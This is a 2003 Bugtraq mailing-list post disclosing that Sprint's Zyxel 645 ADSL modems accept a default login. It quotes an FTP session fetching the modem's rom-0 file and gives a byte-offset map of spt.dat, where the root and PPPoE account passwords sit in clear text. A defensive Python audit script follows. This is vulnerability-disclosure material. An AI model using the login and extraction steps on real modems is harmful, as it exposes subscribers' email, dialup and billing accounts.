Bugtraq mailing list archives

Re: SPRINT ADSL [Zyxel 645 Series Modem]


From: "http-equiv () excite com" <http-equiv () malware com>
Date: Tue, 11 Feb 2003 17:30:10 -0000



FX <fx () phenoelit de> said:

ftp> open malware.com
Connected to malware.com.
220 Sprint FTP version 1.0 ready at Wed Jan  5 17:20:47 2000
User (malware.com:(none)):
331 Enter PASS command
Password:
230 Logged in
ftp> get rom-0

I'm not sure if this applies to the Zyxel boxes you found, but there is
another file called spt.dat, which contains all password and account
information. More details can be found here:
http://www.DarkLab.org/archive/msg00144.html

FX

Yes FX you are correct. After a good swift kick in the nuts, Sprint 
has done and is still doing an admirable job in fixing this. 

Sufficient time has elapsed to advise this.

The only additional note is to strongly suggest that the users change 
their master account password as well:

<!-- 

Friday, January 24, 2003

Ladies and Gentlemen:

Reference the information provided to you on Monday and Tuesday of 
this week and subsequent announcements on Thursday this week:

http://www.wired.com/news/infostructure/0,1377,57342,00.html

http://www.securityfocusonline.com/archive/1/307793/2003-01-22/2003-01-28/0

This message serves to inform you that your entire user base is open 
to full and complete remote compromise through this modem.

This includes full access to:

1. the internet via adsl and dialup connection
2. pop3 email retrieval
3. webmail 
4. web based user account management including user name and address 
and billing details

The problem lies in the fact that the modem you have provided to your 
user base is installed with a commonly known default login and 
password. Once access has been gained to this modem, it is trivially 
possible to retrieve a storage file contained within the modem which 
includes the user's name and password.

With this information it is possible to access all aspects of the 
user account as described above.

Example:

00000020: 1234
00000042: malst
00000060: Sprint
00000082: mal Ware
000000AC: public
000000CC: public
000000EC: public
00001086: dhcppc
00001C54: MyISP
00001DDE: grandpamalware
00001DEB: malware.
00001DFE: ware
00002112: mal

0x20 the root password in clear
0x40 SNMP Location
0x60 Device name
0x80 SNMP Sys Contact
0xac SNMP read community
0xcc SNMP read community
0xec SNMP read community
0x188 SUA Server IP address
0x1c54 First PPPoE Account config name (Default: ChangeMe)
0x1dde First PPPoE Username
0x1dfe First PPPoE Password
0x21dc Second PPPoE Account config name

Where username: grandpamalware () malware com and pass: ware inputted 
into a dialup connection with specific access number, will function, 
where inputted into a pop3 mail client with corresponding pop3 
server, will retrieve mail accordingly, where inputted into a web 
based mail access, will allow for access and where access to 
myaccount information is required, will allow for authentication and 
login.

In other words, the single user id and email address along with the 
single pass all contained within the file on the modem will allow 
access to everything!

The file on the modem is a small dat file called spt.dat; therein, in
clear text, lies all this information.

This information is already in the public domain and you need to
urgently firewall your user base ports http, telnet, and ftp while
you solve this problem. You must assume that malicious parties are
well aware of and are probably exploiting it right now.

Today is Friday. Nothing has been done about this to date. Your 
entire user base is at risk.

We expect some sort of substantial action by Tuesday latest. Failing 
that, we will discuss this in technical depth on all relevant 
security lists.

End Call

cc: 

Wired
@pc-radio.com
Symantec
@securityfocus.com
CERT
@cert.org 
Earthlink
@corp.earthlink.net
abuse () earthlink net
security@corp.earthlink
Sprint
@mail.sprint.com
noc () sprint net
abuse () sprint net
security () sprint net


-- 
http://www.malware.com

 -->

Date: Tue, 28 Jan 2003 17:01:25 -0500

<!-- 

Sprint is working closely with its DSL modem manufacturer to ensure the
security and integrity of its Sprint-provided DSL equipment. Sprint is
dedicated to providing its customers a secure broadband Internet
network, and to that end, recently identified an additional layer of
security that can help protect customers' DSL modems.

The company began notifying its customers - one-by-one - in a very
targeted initiative to provide guidance on ensuring their DSL service is
reliable and secure. We are consulting with our customers and walking
them through the relatively simple steps to ensure an additional layer
of security on their modem.

Proactively, we are reaching out to our customers in three different
ways - outbound telephone calls, e-mail messages and a customer letter
mailed today (Jan. 28). These communications are directed at helping
ensure the safety and security of customers' DSL modems.

Additionally, we are informing all DSL customers who call our technical
assistance group of the procedures for securing their modem.

Sprint is committed to providing safe, reliable and secure voice and
data services to all its customers. When an event occurs that threatens
that safety, reliability and security, we take it very seriously and we
will continue to do everything we can to contact our customers.



Director-Customer Operations

 -->

Notes: users can address the issue here:

http://csb.sprint.com/home/local/dslhelp/release645m.html


-- 
http://www.malware.com
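As an added defender-side example (not code from this post, from Sprint or from Zyxel), the following Python audit reads the field offsets listed in the letter above out of a constructed spt.dat-like image and reports the weaknesses the letter describes (factory-default admin password, "public" SNMP communities, PPPoE credentials kept in clear text) without echoing any secret value. Two things are assumptions: that each field occupies a slot of at most 32 bytes, and that the "1234" seen in the post's dump is the factory default.

```python
from typing import Dict, List
# Field offsets (NUL-terminated ASCII) from the offset table in the post.
FIELDS = {
    "root_password": 0x20, "snmp_location": 0x40, "device_name": 0x60,
    "snmp_contact": 0x80, "snmp_community_1": 0xAC, "snmp_community_2": 0xCC,
    "snmp_community_3": 0xEC, "pppoe_account_name": 0x1C54,
    "pppoe_username": 0x1DDE, "pppoe_password": 0x1DFE,
}
SECRET_FIELDS = {"root_password", "pppoe_password"}
DEFAULT_ROOT_PASSWORD = "1234"  # assumption: the value in the post's dump is the factory default
DEFAULT_COMMUNITY = "public"
MAX_FIELD = 32  # assumption: each field occupies a slot of at most 32 bytes

def read_cstring(data: bytes, offset: int, limit: int = MAX_FIELD) -> str:
    """Decode the ASCII string at offset, stopping at the first NUL or at limit."""
    chunk = data[offset:offset + limit]
    end = chunk.find(b"\x00")
    return (chunk if end == -1 else chunk[:end]).decode("ascii", errors="replace")

def parse_spt(data: bytes) -> Dict[str, str]:
    """Read every documented field out of an spt.dat image."""
    return {name: read_cstring(data, off) for name, off in FIELDS.items()}

def audit(fields: Dict[str, str]) -> List[str]:
    """One finding per weakness the post describes; secret values are never echoed."""
    findings = []
    if fields["root_password"] == DEFAULT_ROOT_PASSWORD:
        findings.append("root password is the factory default")
    for slot in ("snmp_community_1", "snmp_community_2", "snmp_community_3"):
        if fields[slot] == DEFAULT_COMMUNITY:
            findings.append(f"{slot} is the well-known '{DEFAULT_COMMUNITY}' community")
    if fields["pppoe_password"]:
        findings.append("PPPoE account password is stored in clear text")
    return findings

def redacted(fields: Dict[str, str]) -> Dict[str, str]:
    """Copy of the fields with secrets replaced by their length, safe to log or report."""
    return {k: (f"<{len(v)} chars>" if k in SECRET_FIELDS else v) for k, v in fields.items()}

def build_sample_image() -> bytes:
    """Constructed spt.dat-like image (not a real capture) mirroring the post's layout."""
    image = bytearray(0x2200)
    sample = {"root_password": "1234", "snmp_location": "lab", "device_name": "Sprint",
              "snmp_contact": "demo user", "snmp_community_1": "public",
              "snmp_community_2": "public", "snmp_community_3": "public",
              "pppoe_account_name": "MyISP", "pppoe_username": "demo@example.net",
              "pppoe_password": "demo"}
    for name, value in sample.items():
        image[FIELDS[name]:FIELDS[name] + len(value)] = value.encode("ascii")
    return bytes(image)
```

Running `audit(parse_spt(build_sample_image()))` on the constructed image yields five findings; after the defaults are changed only the clear-text PPPoE password remains, which is inherent to the file format and is why the post advises changing the master account password as well.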



